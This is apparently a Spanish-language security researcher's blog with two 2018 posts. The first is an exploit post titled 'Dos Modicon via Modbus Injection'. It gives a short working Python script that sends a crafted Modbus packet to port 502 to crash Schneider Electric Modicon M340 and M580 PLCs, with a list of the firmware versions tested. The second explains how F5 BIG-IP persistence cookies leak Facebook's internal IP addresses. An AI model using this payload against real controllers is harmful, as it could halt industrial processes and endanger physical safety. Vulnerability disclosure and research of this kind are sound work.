sábado, 31 de marzo de 2018

[Tool][Schneider] Dos Modicon via Modbus Injection

PLC Modicon line ("m340" & "m580") suffer a denial of services upon receiving a simple request to the "modbus" protocol.

 # Exploit Title: "Dos Modicon via Modbus Injection" 
 # CVE:                 2018-???? <-- soon !!!
 # CVSS Base Score v3: 8.6 / 10
 # CVSS Vector String: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H  
 # Date: 2/01/2018
 # Exploit Author:      Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
 # Vendor: Schneider Electric
 # devices(tested): PLC Modicon m340 (v2.0 > v2.8) & modicom m580 & Quantum (fix v2.42)




Exploit:
import socket 

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
client.connect(("192.168.0.101",502)) 
client.send( "\x44\x62\x00\x00\x00\x06\x00\x5a\x00\x20\x00\x00") 
client.close()




M340                                                                                              m580

Tested in:

[+] m430
BMX P34 2020 v2.0 (TELEMECANIQUE)         
BMX P34 2020 v2.1                          
BMX P34 2020 v2.2                          
...                                        --
BMX P34 2020 v2.4                          
BMX P34 2020 v2.5                          
BMX P34 2020 v2.6                          
BMX P34 2020 v2.7                           
BMX P34 2020 v2.8                          
-------------------------------

[+] m580
BME P58 2020 v01.04
BME P58 2020 v02.20
BME P58 4040 v02.20
BME P58 4040 v02.12

sábado, 17 de marzo de 2018

Leaking Facebook Internal Ip Infrastructure - no bounty payment from facebook _(english - google)

An attacker can receive confidential information about the international network through the BIG-IP LTM persistence cookie. 

Cookies that are not inside a website. Instead, they have been sent by an intermediary: The load balance of the signature F5, who always has the possibility of finding the client and the service that finally wants to connect us 

Then it is the balancer that defines for us (client) a host from an http / apps group. 

In addition to determining the most optimal path, one each time a cookie is requested that reaches our client as value an IP and PORT confused / encoded, identifying the host (that the balancer defined for our request) from where the resources that we we have called 

[Facebook][ F5 BIG-IP ] PERSISTENCE COOKIE INFORMATION LEAKAGE

( El titulo alternativo era:
Leaking Facebook Internal Ip Infrastructure - no bounty payment from facebook )

Fugas de información de cookies de persistencia (en Facebook )

Un atacante puede recibir información confidencial sobre la red interna a través de la cookie de persistencia BIG-IP LTM.

Cookies que no nacen dentro de un aplicativo web. En cambio son seteadas por un intermediario: El balanceador de carga de la firma F5, quien seguramente siempre se encontrara entre el cliente y el servicio al que finalmente nos queremos conectar.

Entonces es el balanceador quien define para nosotros (cliente) un host  de entre un pool http/apps.
Además de determinar el camino mas optimo, a cada una de nuestras peticiones se le setea una cookie que al llegar a nuestro cliente trae como valor una IP y PUERTO ofuscados/encodeados, identificando al host (que el balanceador definió para nuestro request ) desde donde llegan los recursos que nosotros  inicialmente llamamos.   

Esas cookies en su respuesta traen valores encodeados y existe una documentación oficial al respecto; https://support.f5.com/csp/article/K6917?sr=19342610.